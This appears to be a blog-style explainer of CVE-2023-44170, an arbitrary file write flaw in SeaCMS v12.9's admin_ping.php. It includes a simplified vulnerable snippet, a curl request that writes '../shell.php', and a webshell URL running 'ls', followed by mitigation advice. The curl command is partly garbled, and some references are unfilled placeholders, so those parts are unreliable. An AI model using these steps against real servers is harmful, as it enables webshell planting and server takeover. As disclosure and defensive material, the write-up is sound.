CVE-2023-44170 - SeaCMS v12.9 Arbitrary File Write Explained (with Exploit Example)

In 2023, a critical vulnerability was discovered in SeaCMS v12.9, a popular open-source video website management system used mainly in Asia. Labeled as CVE-2023-44170, this flaw allows attackers to write files to the web server via the admin_ping.php component. This means an attacker can upload malicious code (like a web shell), gain admin rights, or even totally take over the server.

In this post, we’ll explain the vulnerability in plain English, break down the bug, show a code example, and walk through an actual exploit scenario. If you use or manage SeaCMS, you should read this.

What is Arbitrary File Write?

Arbitrary file write means an attacker can put any file, with any content, anywhere on the target server where the web app has write permissions. In web apps, this is a nightmare because the attacker can upload scripts, overwrite configuration, or set up backdoors.

The vulnerable file is

/admin/admin_ping.php

The bug exists because this PHP file doesn’t properly check, sanitize, or restrict user-supplied data being written to server files. In SeaCMS v12.9, this endpoint can be accessed by an authenticated user (often with weak credentials).

Here’s a code snippet showing the problem area (simplified for clarity)

// admin_ping.php (simplified example)
if(isset($_POST['savestate'])){
    $filename = $_POST['savestate']; // User input!
    $content = $_POST['content'];    // User input!
    file_put_contents($filename, $content); // Writes file!
    echo "ok";
}

The problem? No checks on what file is being written. If you POST to this script, you can overwrite any file the web user can write to. This includes adding backdoors to the webroot.

How to Exploit (Step by Step)

Note: Only test this on systems you own or have permission to test.

Valid credentials (weak or default ones are often used)

- Access to /admin/admin_ping.php

Send a POST request to /admin/admin_ping.php with two parameters

- savestate: The filename to write (e.g., ../shell.php)
- content: The code/content to write (e.g., PHP webshell)

curl -X POST \

-d "savestate=../shell.php" \

d "content=" \

"http://targetsite.com/admin/admin_ping.php"

Access the Webshell:

Go to: http://targetsite.com/shell.php?cmd=ls

Real-World Impact

- Full Server Compromise: An attacker can upload shells, run system commands, steal data, or deface the website.

Data Loss: Overwriting critical files can break the site or harm other users.

## Fix / Mitigation

Upgrade: Check for patched versions of SeaCMS.

- Restrict Access: Block public/admin access by IP or VPN.

Sanitize Input: NEVER use user input directly in file_put_contents or similar functions.

- Remove/Disable admin_ping.php: If not needed, delete or restrict it.

References

- NVD: CVE-2023-44170
- Github Advisory Post
- Exploit-DB Entry (if applicable) *(update with URL if available)*
- Original Disclosure on Seebug

Summary

CVE-2023-44170 in SeaCMS v12.9 is a severe arbitrary file write bug via admin_ping.php. It’s trivial to exploit and could lead to complete webserver takeover. If you run SeaCMS, patch ASAP and block public access to the admin area. For defenders and pen testers, always check for insecure file writes – they’re a hacker’s favorite tool.


Please use this knowledge responsibly. For more exclusive security tips and walkthroughs, stay tuned!

Timeline

Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:36:29 UTC